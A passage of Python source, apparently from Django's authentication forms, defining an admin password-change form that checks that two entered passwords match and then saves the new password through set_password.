A form used to change the password of a user in the admin interface.
"""
error_messages = {
'password_mismatch': _("The two password fields didn't match."),
}
password1 = forms.CharField(label=_("Password"),
widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password (again)"),
widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super(AdminPasswordChangeForm, self).__init__(*args, **kwargs)
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2:
if password1 != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'])
return password2
def save(self, commit=True):
"""
Saves the new password.
"""
self.user.set_password(self.cleaned_data["password1"])
if commit:
self.user.save()
return self.user
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.